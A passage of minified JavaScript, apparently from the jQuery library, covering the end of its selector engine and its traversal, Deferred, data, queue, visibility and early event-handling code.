(p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] = [T, x]), p !== t));); return (x -= i) === r || x % r == 0 && x / r >= 0 } } }, PSEUDO: function (e, t) { var n, i = r.pseudos[e] || r.setFilters[e.toLowerCase()] || se.error("unsupported pseudo: " + e); return i[b] ? i(t) : i.length > 1 ? (n = [e, e, "", t], r.setFilters.hasOwnProperty(e.toLowerCase()) ? le(function (e, n) { for (var r, o = i(e, t), a = o.length; a--;)e[r = P(e, o[a])] = !(n[r] = o[a]) }) : function (e) { return i(e, 0, n) }) : i } }, pseudos: { not: le(function (e) { var t = [], n = [], r = s(e.replace(B, "$1")); return r[b] ? le(function (e, t, n, i) { for (var o, a = r(e, null, i, []), s = e.length; s--;)(o = a[s]) && (e[s] = !(t[s] = o)) }) : function (e, i, o) { return t[0] = e, r(t, null, o, n), t[0] = null, !n.pop() } }), has: le(function (e) { return function (t) { return se(e, t).length > 0 } }), contains: le(function (e) { return e = e.replace(te, ne), function (t) { return (t.textContent || i(t)).indexOf(e) > -1 } }), lang: le(function (e) { return V.test(e || "") || se.error("unsupported lang: " + e), e = e.replace(te, ne).toLowerCase(), function (t) { var n; do { if (n = g ? t.lang : t.getAttribute("xml:lang") || t.getAttribute("lang")) return (n = n.toLowerCase()) === e || 0 === n.indexOf(e + "-") } while ((t = t.parentNode) && 1 === t.nodeType); return !1 } }), target: function (t) { var n = e.location && e.location.hash; return n && n.slice(1) === t.id }, root: function (e) { return e === h }, focus: function (e) { return e === d.activeElement && (!d.hasFocus || d.hasFocus()) && !!(e.type || e.href || ~e.tabIndex) }, enabled: ge(!1), disabled: ge(!0), checked: function (e) { var t = e.nodeName.toLowerCase(); return "input" === t && !!e.checked || "option" === t && !!e.selected }, selected: function (e) { return e.parentNode && e.parentNode.selectedIndex, !0 === e.selected }, empty: function (e) { for (e = e.firstChild; e; e = e.nextSibling)if (e.nodeType < 6) return !1; return !0 }, parent: function (e) { return !r.pseudos.empty(e) }, header: function (e) { return J.test(e.nodeName) }, input: function (e) { return Q.test(e.nodeName) }, button: function (e) { var t = e.nodeName.toLowerCase(); return "input" === t && "button" === e.type || "button" === t }, text: function (e) { var t; return "input" === e.nodeName.toLowerCase() && "text" === e.type && (null == (t = e.getAttribute("type")) || "text" === t.toLowerCase()) }, first: ve(function () { return [0] }), last: ve(function (e, t) { return [t - 1] }), eq: ve(function (e, t, n) { return [n < 0 ? n + t : n] }), even: ve(function (e, t) { for (var n = 0; n < t; n += 2)e.push(n); return e }), odd: ve(function (e, t) { for (var n = 1; n < t; n += 2)e.push(n); return e }), lt: ve(function (e, t, n) { for (var r = n < 0 ? n + t : n > t ? t : n; --r >= 0;)e.push(r); return e }), gt: ve(function (e, t, n) { for (var r = n < 0 ? n + t : n; ++r < t;)e.push(r); return e }) } }).pseudos.nth = r.pseudos.eq, { radio: !0, checkbox: !0, file: !0, password: !0, image: !0 }) r.pseudos[t] = de(t); for (t in { submit: !0, reset: !0 }) r.pseudos[t] = he(t); function me() { } function xe(e) { for (var t = 0, n = e.length, r = ""; t < n; t++)r += e[t].value; return r } function be(e, t, n) { var r = t.dir, i = t.next, o = i || r, a = n && "parentNode" === o, s = C++; return t.first ? function (t, n, i) { for (; t = t[r];)if (1 === t.nodeType || a) return e(t, n, i); return !1 } : function (t, n, u) { var l, c, f, p = [T, s]; if (u) { for (; t = t[r];)if ((1 === t.nodeType || a) && e(t, n, u)) return !0 } else for (; t = t[r];)if (1 === t.nodeType || a) if (c = (f = t[b] || (t[b] = {}))[t.uniqueID] || (f[t.uniqueID] = {}), i && i === t.nodeName.toLowerCase()) t = t[r] || t; else { if ((l = c[o]) && l[0] === T && l[1] === s) return p[2] = l[2]; if (c[o] = p, p[2] = e(t, n, u)) return !0 } return !1 } } function we(e) { return e.length > 1 ? function (t, n, r) { for (var i = e.length; i--;)if (!e[i](t, n, r)) return !1; return !0 } : e[0] } function Te(e, t, n, r, i) { for (var o, a = [], s = 0, u = e.length, l = null != t; s < u; s++)(o = e[s]) && (n && !n(o, r, i) || (a.push(o), l && t.push(s))); return a } function Ce(e, t, n, r, i, o) { return r && !r[b] && (r = Ce(r)), i && !i[b] && (i = Ce(i, o)), le(function (o, a, s, u) { var l, c, f, p = [], d = [], h = a.length, g = o || function (e, t, n) { for (var r = 0, i = t.length; r < i; r++)se(e, t[r], n); return n }(t || "*", s.nodeType ? [s] : s, []), v = !e || !o && t ? g : Te(g, p, e, s, u), y = n ? i || (o ? e : h || r) ? [] : a : v; if (n && n(v, y, s, u), r) for (l = Te(y, d), r(l, [], s, u), c = l.length; c--;)(f = l[c]) && (y[d[c]] = !(v[d[c]] = f)); if (o) { if (i || e) { if (i) { for (l = [], c = y.length; c--;)(f = y[c]) && l.push(v[c] = f); i(null, y = [], l, u) } for (c = y.length; c--;)(f = y[c]) && (l = i ? P(o, f) : p[c]) > -1 && (o[l] = !(a[l] = f)) } } else y = Te(y === a ? y.splice(h, y.length) : y), i ? i(null, a, y, u) : H.apply(a, y) }) } function Ee(e) { for (var t, n, i, o = e.length, a = r.relative[e[0].type], s = a || r.relative[" "], u = a ? 1 : 0, c = be(function (e) { return e === t }, s, !0), f = be(function (e) { return P(t, e) > -1 }, s, !0), p = [function (e, n, r) { var i = !a && (r || n !== l) || ((t = n).nodeType ? c(e, n, r) : f(e, n, r)); return t = null, i }]; u < o; u++)if (n = r.relative[e[u].type]) p = [be(we(p), n)]; else { if ((n = r.filter[e[u].type].apply(null, e[u].matches))[b]) { for (i = ++u; i < o && !r.relative[e[i].type]; i++); return Ce(u > 1 && we(p), u > 1 && xe(e.slice(0, u - 1).concat({ value: " " === e[u - 2].type ? "*" : "" })).replace(B, "$1"), n, u < i && Ee(e.slice(u, i)), i < o && Ee(e = e.slice(i)), i < o && xe(e)) } p.push(n) } return we(p) } return me.prototype = r.filters = r.pseudos, r.setFilters = new me, a = se.tokenize = function (e, t) { var n, i, o, a, s, u, l, c = S[e + " "]; if (c) return t ? 0 : c.slice(0); for (s = e, u = [], l = r.preFilter; s;) { for (a in n && !(i = _.exec(s)) || (i && (s = s.slice(i[0].length) || s), u.push(o = [])), n = !1, (i = z.exec(s)) && (n = i.shift(), o.push({ value: n, type: i[0].replace(B, " ") }), s = s.slice(n.length)), r.filter) !(i = G[a].exec(s)) || l[a] && !(i = l[a](i)) || (n = i.shift(), o.push({ value: n, type: a, matches: i }), s = s.slice(n.length)); if (!n) break } return t ? s.length : s ? se.error(e) : S(e, u).slice(0) }, s = se.compile = function (e, t) { var n, i = [], o = [], s = k[e + " "]; if (!s) { for (t || (t = a(e)), n = t.length; n--;)(s = Ee(t[n]))[b] ? i.push(s) : o.push(s); (s = k(e, function (e, t) { var n = t.length > 0, i = e.length > 0, o = function (o, a, s, u, c) { var f, h, v, y = 0, m = "0", x = o && [], b = [], w = l, C = o || i && r.find.TAG("*", c), E = T += null == w ? 1 : Math.random() || .1, S = C.length; for (c && (l = a == d || a || c); m !== S && null != (f = C[m]); m++) { if (i && f) { for (h = 0, a || f.ownerDocument == d || (p(f), s = !g); v = e[h++];)if (v(f, a || d, s)) { u.push(f); break } c && (T = E) } n && ((f = !v && f) && y--, o && x.push(f)) } if (y += m, n && m !== y) { for (h = 0; v = t[h++];)v(x, b, a, s); if (o) { if (y > 0) for (; m--;)x[m] || b[m] || (b[m] = q.call(u)); b = Te(b) } H.apply(u, b), c && !o && b.length > 0 && y + t.length > 1 && se.uniqueSort(u) } return c && (T = E, l = w), x }; return n ? le(o) : o }(o, i))).selector = e } return s }, u = se.select = function (e, t, n, i) { var o, u, l, c, f, p = "function" == typeof e && e, d = !i && a(e = p.selector || e); if (n = n || [], 1 === d.length) { if ((u = d[0] = d[0].slice(0)).length > 2 && "ID" === (l = u[0]).type && 9 === t.nodeType && g && r.relative[u[1].type]) { if (!(t = (r.find.ID(l.matches[0].replace(te, ne), t) || [])[0])) return n; p && (t = t.parentNode), e = e.slice(u.shift().value.length) } for (o = G.needsContext.test(e) ? 0 : u.length; o-- && (l = u[o], !r.relative[c = l.type]);)if ((f = r.find[c]) && (i = f(l.matches[0].replace(te, ne), ee.test(u[0].type) && ye(t.parentNode) || t))) { if (u.splice(o, 1), !(e = i.length && xe(u))) return H.apply(n, i), n; break } } return (p || s(e, d))(i, t, !g, n, !t || ee.test(e) && ye(t.parentNode) || t), n }, n.sortStable = b.split("").sort(N).join("") === b, n.detectDuplicates = !!f, p(), n.sortDetached = ce(function (e) { return 1 & e.compareDocumentPosition(d.createElement("fieldset")) }), ce(function (e) { return e.innerHTML = "<a href='#'></a>", "#" === e.firstChild.getAttribute("href") }) || fe("type|href|height|width", function (e, t, n) { if (!n) return e.getAttribute(t, "type" === t.toLowerCase() ? 1 : 2) }), n.attributes && ce(function (e) { return e.innerHTML = "<input/>", e.firstChild.setAttribute("value", ""), "" === e.firstChild.getAttribute("value") }) || fe("value", function (e, t, n) { if (!n && "input" === e.nodeName.toLowerCase()) return e.defaultValue }), ce(function (e) { return null == e.getAttribute("disabled") }) || fe(R, function (e, t, n) { var r; if (!n) return !0 === e[t] ? t.toLowerCase() : (r = e.getAttributeNode(t)) && r.specified ? r.value : null }), se }(e); b.find = T, b.expr = T.selectors, b.expr[":"] = b.expr.pseudos, b.uniqueSort = b.unique = T.uniqueSort, b.text = T.getText, b.isXMLDoc = T.isXML, b.contains = T.contains, b.escapeSelector = T.escape; var C = function (e, t, n) { for (var r = [], i = void 0 !== n; (e = e[t]) && 9 !== e.nodeType;)if (1 === e.nodeType) { if (i && b(e).is(n)) break; r.push(e) } return r }, E = function (e, t) { for (var n = []; e; e = e.nextSibling)1 === e.nodeType && e !== t && n.push(e); return n }, S = b.expr.match.needsContext; function k(e, t) { return e.nodeName && e.nodeName.toLowerCase() === t.toLowerCase() } var A = /^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i; function N(e, t, n) { return h(t) ? b.grep(e, function (e, r) { return !!t.call(e, r, e) !== n }) : t.nodeType ? b.grep(e, function (e) { return e === t !== n }) : "string" != typeof t ? b.grep(e, function (e) { return s.call(t, e) > -1 !== n }) : b.filter(t, e, n) } b.filter = function (e, t, n) { var r = t[0]; return n && (e = ":not(" + e + ")"), 1 === t.length && 1 === r.nodeType ? b.find.matchesSelector(r, e) ? [r] : [] : b.find.matches(e, b.grep(t, function (e) { return 1 === e.nodeType })) }, b.fn.extend({ find: function (e) { var t, n, r = this.length, i = this; if ("string" != typeof e) return this.pushStack(b(e).filter(function () { for (t = 0; t < r; t++)if (b.contains(i[t], this)) return !0 })); for (n = this.pushStack([]), t = 0; t < r; t++)b.find(e, i[t], n); return r > 1 ? b.uniqueSort(n) : n }, filter: function (e) { return this.pushStack(N(this, e || [], !1)) }, not: function (e) { return this.pushStack(N(this, e || [], !0)) }, is: function (e) { return !!N(this, "string" == typeof e && S.test(e) ? b(e) : e || [], !1).length } }); var j, D = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/; (b.fn.init = function (e, t, n) { var r, i; if (!e) return this; if (n = n || j, "string" == typeof e) { if (!(r = "<" === e[0] && ">" === e[e.length - 1] && e.length >= 3 ? [null, e, null] : D.exec(e)) || !r[1] && t) return !t || t.jquery ? (t || n).find(e) : this.constructor(t).find(e); if (r[1]) { if (t = t instanceof b ? t[0] : t, b.merge(this, b.parseHTML(r[1], t && t.nodeType ? t.ownerDocument || t : v, !0)), A.test(r[1]) && b.isPlainObject(t)) for (r in t) h(this[r]) ? this[r](t[r]) : this.attr(r, t[r]); return this } return (i = v.getElementById(r[2])) && (this[0] = i, this.length = 1), this } return e.nodeType ? (this[0] = e, this.length = 1, this) : h(e) ? void 0 !== n.ready ? n.ready(e) : e(b) : b.makeArray(e, this) }).prototype = b.fn, j = b(v); var q = /^(?:parents|prev(?:Until|All))/, L = { children: !0, contents: !0, next: !0, prev: !0 }; function H(e, t) { for (; (e = e[t]) && 1 !== e.nodeType;); return e } b.fn.extend({ has: function (e) { var t = b(e, this), n = t.length; return this.filter(function () { for (var e = 0; e < n; e++)if (b.contains(this, t[e])) return !0 }) }, closest: function (e, t) { var n, r = 0, i = this.length, o = [], a = "string" != typeof e && b(e); if (!S.test(e)) for (; r < i; r++)for (n = this[r]; n && n !== t; n = n.parentNode)if (n.nodeType < 11 && (a ? a.index(n) > -1 : 1 === n.nodeType && b.find.matchesSelector(n, e))) { o.push(n); break } return this.pushStack(o.length > 1 ? b.uniqueSort(o) : o) }, index: function (e) { return e ? "string" == typeof e ? s.call(b(e), this[0]) : s.call(this, e.jquery ? e[0] : e) : this[0] && this[0].parentNode ? this.first().prevAll().length : -1 }, add: function (e, t) { return this.pushStack(b.uniqueSort(b.merge(this.get(), b(e, t)))) }, addBack: function (e) { return this.add(null == e ? this.prevObject : this.prevObject.filter(e)) } }), b.each({ parent: function (e) { var t = e.parentNode; return t && 11 !== t.nodeType ? t : null }, parents: function (e) { return C(e, "parentNode") }, parentsUntil: function (e, t, n) { return C(e, "parentNode", n) }, next: function (e) { return H(e, "nextSibling") }, prev: function (e) { return H(e, "previousSibling") }, nextAll: function (e) { return C(e, "nextSibling") }, prevAll: function (e) { return C(e, "previousSibling") }, nextUntil: function (e, t, n) { return C(e, "nextSibling", n) }, prevUntil: function (e, t, n) { return C(e, "previousSibling", n) }, siblings: function (e) { return E((e.parentNode || {}).firstChild, e) }, children: function (e) { return E(e.firstChild) }, contents: function (e) { return null != e.contentDocument && r(e.contentDocument) ? e.contentDocument : (k(e, "template") && (e = e.content || e), b.merge([], e.childNodes)) } }, function (e, t) { b.fn[e] = function (n, r) { var i = b.map(this, t, n); return "Until" !== e.slice(-5) && (r = n), r && "string" == typeof r && (i = b.filter(r, i)), this.length > 1 && (L[e] || b.uniqueSort(i), q.test(e) && i.reverse()), this.pushStack(i) } }); var O = /[^\x20\t\r\n\f]+/g; function P(e) { return e } function R(e) { throw e } function M(e, t, n, r) { var i; try { e && h(i = e.promise) ? i.call(e).done(t).fail(n) : e && h(i = e.then) ? i.call(e, t, n) : t.apply(void 0, [e].slice(r)) } catch (e) { n.apply(void 0, [e]) } } b.Callbacks = function (e) { e = "string" == typeof e ? function (e) { var t = {}; return b.each(e.match(O) || [], function (e, n) { t[n] = !0 }), t }(e) : b.extend({}, e); var t, n, r, i, o = [], a = [], s = -1, u = function () { for (i = i || e.once, r = t = !0; a.length; s = -1)for (n = a.shift(); ++s < o.length;)!1 === o[s].apply(n[0], n[1]) && e.stopOnFalse && (s = o.length, n = !1); e.memory || (n = !1), t = !1, i && (o = n ? [] : "") }, l = { add: function () { return o && (n && !t && (s = o.length - 1, a.push(n)), function t(n) { b.each(n, function (n, r) { h(r) ? e.unique && l.has(r) || o.push(r) : r && r.length && "string" !== x(r) && t(r) }) }(arguments), n && !t && u()), this }, remove: function () { return b.each(arguments, function (e, t) { for (var n; (n = b.inArray(t, o, n)) > -1;)o.splice(n, 1), n <= s && s-- }), this }, has: function (e) { return e ? b.inArray(e, o) > -1 : o.length > 0 }, empty: function () { return o && (o = []), this }, disable: function () { return i = a = [], o = n = "", this }, disabled: function () { return !o }, lock: function () { return i = a = [], n || t || (o = n = ""), this }, locked: function () { return !!i }, fireWith: function (e, n) { return i || (n = [e, (n = n || []).slice ? n.slice() : n], a.push(n), t || u()), this }, fire: function () { return l.fireWith(this, arguments), this }, fired: function () { return !!r } }; return l }, b.extend({ Deferred: function (t) { var n = [["notify", "progress", b.Callbacks("memory"), b.Callbacks("memory"), 2], ["resolve", "done", b.Callbacks("once memory"), b.Callbacks("once memory"), 0, "resolved"], ["reject", "fail", b.Callbacks("once memory"), b.Callbacks("once memory"), 1, "rejected"]], r = "pending", i = { state: function () { return r }, always: function () { return o.done(arguments).fail(arguments), this }, catch: function (e) { return i.then(null, e) }, pipe: function () { var e = arguments; return b.Deferred(function (t) { b.each(n, function (n, r) { var i = h(e[r[4]]) && e[r[4]]; o[r[1]](function () { var e = i && i.apply(this, arguments); e && h(e.promise) ? e.promise().progress(t.notify).done(t.resolve).fail(t.reject) : t[r[0] + "With"](this, i ? [e] : arguments) }) }), e = null }).promise() }, then: function (t, r, i) { var o = 0; function a(t, n, r, i) { return function () { var s = this, u = arguments, l = function () { var e, l; if (!(t < o)) { if ((e = r.apply(s, u)) === n.promise()) throw new TypeError("Thenable self-resolution"); l = e && ("object" == typeof e || "function" == typeof e) && e.then, h(l) ? i ? l.call(e, a(o, n, P, i), a(o, n, R, i)) : (o++, l.call(e, a(o, n, P, i), a(o, n, R, i), a(o, n, P, n.notifyWith))) : (r !== P && (s = void 0, u = [e]), (i || n.resolveWith)(s, u)) } }, c = i ? l : function () { try { l() } catch (e) { b.Deferred.exceptionHook && b.Deferred.exceptionHook(e, c.stackTrace), t + 1 >= o && (r !== R && (s = void 0, u = [e]), n.rejectWith(s, u)) } }; t ? c() : (b.Deferred.getStackHook && (c.stackTrace = b.Deferred.getStackHook()), e.setTimeout(c)) } } return b.Deferred(function (e) { n[0][3].add(a(0, e, h(i) ? i : P, e.notifyWith)), n[1][3].add(a(0, e, h(t) ? t : P)), n[2][3].add(a(0, e, h(r) ? r : R)) }).promise() }, promise: function (e) { return null != e ? b.extend(e, i) : i } }, o = {}; return b.each(n, function (e, t) { var a = t[2], s = t[5]; i[t[1]] = a.add, s && a.add(function () { r = s }, n[3 - e][2].disable, n[3 - e][3].disable, n[0][2].lock, n[0][3].lock), a.add(t[3].fire), o[t[0]] = function () { return o[t[0] + "With"](this === o ? void 0 : this, arguments), this }, o[t[0] + "With"] = a.fireWith }), i.promise(o), t && t.call(o, o), o }, when: function (e) { var t = arguments.length, n = t, r = Array(n), o = i.call(arguments), a = b.Deferred(), s = function (e) { return function (n) { r[e] = this, o[e] = arguments.length > 1 ? i.call(arguments) : n, --t || a.resolveWith(r, o) } }; if (t <= 1 && (M(e, a.done(s(n)).resolve, a.reject, !t), "pending" === a.state() || h(o[n] && o[n].then))) return a.then(); for (; n--;)M(o[n], s(n), a.reject); return a.promise() } }); var I = /^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/; b.Deferred.exceptionHook = function (t, n) { e.console && e.console.warn && t && I.test(t.name) && e.console.warn("jQuery.Deferred exception: " + t.message, t.stack, n) }, b.readyException = function (t) { e.setTimeout(function () { throw t }) }; var W = b.Deferred(); function F() { v.removeEventListener("DOMContentLoaded", F), e.removeEventListener("load", F), b.ready() } b.fn.ready = function (e) { return W.then(e).catch(function (e) { b.readyException(e) }), this }, b.extend({ isReady: !1, readyWait: 1, ready: function (e) { (!0 === e ? --b.readyWait : b.isReady) || (b.isReady = !0, !0 !== e && --b.readyWait > 0 || W.resolveWith(v, [b])) } }), b.ready.then = W.then, "complete" === v.readyState || "loading" !== v.readyState && !v.documentElement.doScroll ? e.setTimeout(b.ready) : (v.addEventListener("DOMContentLoaded", F), e.addEventListener("load", F)); var B = function (e, t, n, r, i, o, a) { var s = 0, u = e.length, l = null == n; if ("object" === x(n)) for (s in i = !0, n) B(e, t, s, n[s], !0, o, a); else if (void 0 !== r && (i = !0, h(r) || (a = !0), l && (a ? (t.call(e, r), t = null) : (l = t, t = function (e, t, n) { return l.call(b(e), n) })), t)) for (; s < u; s++)t(e[s], n, a ? r : r.call(e[s], s, t(e[s], n))); return i ? e : l ? t.call(e) : u ? t(e[0], n) : o }, _ = /^-ms-/, z = /-([a-z])/g; function U(e, t) { return t.toUpperCase() } function X(e) { return e.replace(_, "ms-").replace(z, U) } var V = function (e) { return 1 === e.nodeType || 9 === e.nodeType || !+e.nodeType }; function G() { this.expando = b.expando + G.uid++ } G.uid = 1, G.prototype = { cache: function (e) { var t = e[this.expando]; return t || (t = {}, V(e) && (e.nodeType ? e[this.expando] = t : Object.defineProperty(e, this.expando, { value: t, configurable: !0 }))), t }, set: function (e, t, n) { var r, i = this.cache(e); if ("string" == typeof t) i[X(t)] = n; else for (r in t) i[X(r)] = t[r]; return i }, get: function (e, t) { return void 0 === t ? this.cache(e) : e[this.expando] && e[this.expando][X(t)] }, access: function (e, t, n) { return void 0 === t || t && "string" == typeof t && void 0 === n ? this.get(e, t) : (this.set(e, t, n), void 0 !== n ? n : t) }, remove: function (e, t) { var n, r = e[this.expando]; if (void 0 !== r) { if (void 0 !== t) { n = (t = Array.isArray(t) ? t.map(X) : (t = X(t)) in r ? [t] : t.match(O) || []).length; for (; n--;)delete r[t[n]] } (void 0 === t || b.isEmptyObject(r)) && (e.nodeType ? e[this.expando] = void 0 : delete e[this.expando]) } }, hasData: function (e) { var t = e[this.expando]; return void 0 !== t && !b.isEmptyObject(t) } }; var Y = new G, Q = new G, J = /^(?:\{[\w\W]*\}|\[[\w\W]*\])$/, K = /[A-Z]/g; function Z(e, t, n) { var r; if (void 0 === n && 1 === e.nodeType) if (r = "data-" + t.replace(K, "-$&").toLowerCase(), "string" == typeof (n = e.getAttribute(r))) { try { n = function (e) { return "true" === e || "false" !== e && ("null" === e ? null : e === +e + "" ? +e : J.test(e) ? JSON.parse(e) : e) }(n) } catch (e) { } Q.set(e, t, n) } else n = void 0; return n } b.extend({ hasData: function (e) { return Q.hasData(e) || Y.hasData(e) }, data: function (e, t, n) { return Q.access(e, t, n) }, removeData: function (e, t) { Q.remove(e, t) }, _data: function (e, t, n) { return Y.access(e, t, n) }, _removeData: function (e, t) { Y.remove(e, t) } }), b.fn.extend({ data: function (e, t) { var n, r, i, o = this[0], a = o && o.attributes; if (void 0 === e) { if (this.length && (i = Q.get(o), 1 === o.nodeType && !Y.get(o, "hasDataAttrs"))) { for (n = a.length; n--;)a[n] && 0 === (r = a[n].name).indexOf("data-") && (r = X(r.slice(5)), Z(o, r, i[r])); Y.set(o, "hasDataAttrs", !0) } return i } return "object" == typeof e ? this.each(function () { Q.set(this, e) }) : B(this, function (t) { var n; if (o && void 0 === t) return void 0 !== (n = Q.get(o, e)) ? n : void 0 !== (n = Z(o, e)) ? n : void 0; this.each(function () { Q.set(this, e, t) }) }, null, t, arguments.length > 1, null, !0) }, removeData: function (e) { return this.each(function () { Q.remove(this, e) }) } }), b.extend({ queue: function (e, t, n) { var r; if (e) return t = (t || "fx") + "queue", r = Y.get(e, t), n && (!r || Array.isArray(n) ? r = Y.access(e, t, b.makeArray(n)) : r.push(n)), r || [] }, dequeue: function (e, t) { t = t || "fx"; var n = b.queue(e, t), r = n.length, i = n.shift(), o = b._queueHooks(e, t); "inprogress" === i && (i = n.shift(), r--), i && ("fx" === t && n.unshift("inprogress"), delete o.stop, i.call(e, function () { b.dequeue(e, t) }, o)), !r && o && o.empty.fire() }, _queueHooks: function (e, t) { var n = t + "queueHooks"; return Y.get(e, n) || Y.access(e, n, { empty: b.Callbacks("once memory").add(function () { Y.remove(e, [t + "queue", n]) }) }) } }), b.fn.extend({ queue: function (e, t) { var n = 2; return "string" != typeof e && (t = e, e = "fx", n--), arguments.length < n ? b.queue(this[0], e) : void 0 === t ? this : this.each(function () { var n = b.queue(this, e, t); b._queueHooks(this, e), "fx" === e && "inprogress" !== n[0] && b.dequeue(this, e) }) }, dequeue: function (e) { return this.each(function () { b.dequeue(this, e) }) }, clearQueue: function (e) { return this.queue(e || "fx", []) }, promise: function (e, t) { var n, r = 1, i = b.Deferred(), o = this, a = this.length, s = function () { --r || i.resolveWith(o, [o]) }; for ("string" != typeof e && (t = e, e = void 0), e = e || "fx"; a--;)(n = Y.get(o[a], e + "queueHooks")) && n.empty && (r++, n.empty.add(s)); return s(), i.promise(t) } }); var ee = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source, te = new RegExp("^(?:([+-])=|)(" + ee + ")([a-z%]*)$", "i"), ne = ["Top", "Right", "Bottom", "Left"], re = v.documentElement, ie = function (e) { return b.contains(e.ownerDocument, e) }, oe = { composed: !0 }; re.getRootNode && (ie = function (e) { return b.contains(e.ownerDocument, e) || e.getRootNode(oe) === e.ownerDocument }); var ae = function (e, t) { return "none" === (e = t || e).style.display || "" === e.style.display && ie(e) && "none" === b.css(e, "display") }; function se(e, t, n, r) { var i, o, a = 20, s = r ? function () { return r.cur() } : function () { return b.css(e, t, "") }, u = s(), l = n && n[3] || (b.cssNumber[t] ? "" : "px"), c = e.nodeType && (b.cssNumber[t] || "px" !== l && +u) && te.exec(b.css(e, t)); if (c && c[3] !== l) { for (u /= 2, l = l || c[3], c = +u || 1; a--;)b.style(e, t, c + l), (1 - o) * (1 - (o = s() / u || .5)) <= 0 && (a = 0), c /= o; c *= 2, b.style(e, t, c + l), n = n || [] } return n && (c = +c || +u || 0, i = n[1] ? c + (n[1] + 1) * n[2] : +n[2], r && (r.unit = l, r.start = c, r.end = i)), i } var ue = {}; function le(e) { var t, n = e.ownerDocument, r = e.nodeName, i = ue[r]; return i || (t = n.body.appendChild(n.createElement(r)), i = b.css(t, "display"), t.parentNode.removeChild(t), "none" === i && (i = "block"), ue[r] = i, i) } function ce(e, t) { for (var n, r, i = [], o = 0, a = e.length; o < a; o++)(r = e[o]).style && (n = r.style.display, t ? ("none" === n && (i[o] = Y.get(r, "display") || null, i[o] || (r.style.display = "")), "" === r.style.display && ae(r) && (i[o] = le(r))) : "none" !== n && (i[o] = "none", Y.set(r, "display", n))); for (o = 0; o < a; o++)null != i[o] && (e[o].style.display = i[o]); return e } b.fn.extend({ show: function () { return ce(this, !0) }, hide: function () { return ce(this) }, toggle: function (e) { return "boolean" == typeof e ? e ? this.show() : this.hide() : this.each(function () { ae(this) ? b(this).show() : b(this).hide() }) } }); var fe, pe, de = /^(?:checkbox|radio)$/i, he = /<([a-z][^\/\0>\x20\t\r\n\f]*)/i, ge = /^$|^module$|\/(?:java|ecma)script/i; fe = v.createDocumentFragment().appendChild(v.createElement("div")), (pe = v.createElement("input")).setAttribute("type", "radio"), pe.setAttribute("checked", "checked"), pe.setAttribute("name", "t"), fe.appendChild(pe), d.checkClone = fe.cloneNode(!0).cloneNode(!0).lastChild.checked, fe.innerHTML = "<textarea>x</textarea>", d.noCloneChecked = !!fe.cloneNode(!0).lastChild.defaultValue, fe.innerHTML = "<option></option>", d.option = !!fe.lastChild; var ve = { thead: [1, "<table>", "</table>"], col: [2, "<table><colgroup>", "</colgroup></table>"], tr: [2, "<table><tbody>", "</tbody></table>"], td: [3, "<table><tbody><tr>", "</tr></tbody></table>"], _default: [0, "", ""] }; function ye(e, t) { var n; return n = void 0 !== e.getElementsByTagName ? e.getElementsByTagName(t || "*") : void 0 !== e.querySelectorAll ? e.querySelectorAll(t || "*") : [], void 0 === t || t && k(e, t) ? b.merge([e], n) : n } function me(e, t) { for (var n = 0, r = e.length; n < r; n++)Y.set(e[n], "globalEval", !t || Y.get(t[n], "globalEval")) } ve.tbody = ve.tfoot = ve.colgroup = ve.caption = ve.thead, ve.th = ve.td, d.option || (ve.optgroup = ve.option = [1, "<select multiple='multiple'>", "</select>"]); var xe = /<|&#?\w+;/; function be(e, t, n, r, i) { for (var o, a, s, u, l, c, f = t.createDocumentFragment(), p = [], d = 0, h = e.length; d < h; d++)if ((o = e[d]) || 0 === o) if ("object" === x(o)) b.merge(p, o.nodeType ? [o] : o); else if (xe.test(o)) { for (a = a || f.appendChild(t.createElement("div")), s = (he.exec(o) || ["", ""])[1].toLowerCase(), u = ve[s] || ve._default, a.innerHTML = u[1] + b.htmlPrefilter(o) + u[2], c = u[0]; c--;)a = a.lastChild; b.merge(p, a.childNodes), (a = f.firstChild).textContent = "" } else p.push(t.createTextNode(o)); for (f.textContent = "", d = 0; o = p[d++];)if (r && b.inArray(o, r) > -1) i && i.push(o); else if (l = ie(o), a = ye(f.appendChild(o), "script"), l && me(a), n) for (c = 0; o = a[c++];)ge.test(o.type || "") && n.push(o); return f } var we = /^([^.]*)(?:\.(.+)|)/; function Te() { return !0 } function Ce() { return !1 } function Ee(e, t) { return e === function () { try { return v.activeElement } catch (e) { } }() == ("focus" === t) } function Se(e, t, n, r, i, o) { var a, s; if ("object" == typeof t) { for (s in "string" != typeof n && (r = r || n, n = void 0), t) Se(e, s, n, r, t[s], o); return e } if (null == r && null == i ? (i = n, r = n = void 0) : null == i && ("string" == typeof n ? (i = r, r = void 0) : (i = r, r = n, n = void 0)), !1 === i) i = Ce; else if (!i) return e; return 1 === o && (a = i, (i = function (e) { return b().off(e), a.apply(this, arguments) }).guid = a.guid || (a.guid = b.guid++)), e.each(function () { b.event.add(this, t, i, r, n) }) } function ke(e, t, n) { n ? (Y.set(e, t, !1), b.event.add(e, t, { namespace: !1, handler: function (e) { var r, o, a = Y.get(this, t); if (1 & e.isTrigger && this[t]) { if (a.length) (b.event.special[t] || {}).delegateType && e.stopPropagation(); else if (a = i.call(arguments), Y.set(this, t, a), r = n(this, t), this[t](), a !== (o = Y.get(this, t)) || r ? Y.set(this, t, !1) : o = {}, a !== o) return e.stopImmediatePropagation(), e.preventDefault(), o && o.value } else a.length && (Y.set(this, t, { value: b.event.trigger(b.extend(a[0], b.Event.prototype), a.slice(1), this) }), e.stopImmediatePropagation()) } })) : void 0 === Y.get(e, t) && b.event.add(e, t, Te) } b.event = { global: {}, add: function (e, t, n, r, i) { var o, a, s, u, l, c, f, p, d, h, g, v = Y.get(e); if (V(e)) for (n.handler && (n = (o = n).handler, i = o.selector), i && b.find.matchesSelector(re, i), n.guid || (n.guid = b.guid++), (u = v.events) || (u = v.events = Object.create(null)), (a = v.handle) || (a = v.handle = function (t) { return void 0 !== b && b.event.triggered !== t.type ? b.event.dispatch.apply(e, arguments) : void 0 }), l = (t = (t || "").match(O) || [""]).length; l--;)d = g = (s = we.exec(t[l]) || [])[1], h = (s[2] || "").split(".").sort(), d && (f = b.event.special[d] || {}, d = (i ? f.delegateType : f.bindType) || d, f = b.event.special[d] || {}, c = b.extend({ type: d, origType: g, data: r, 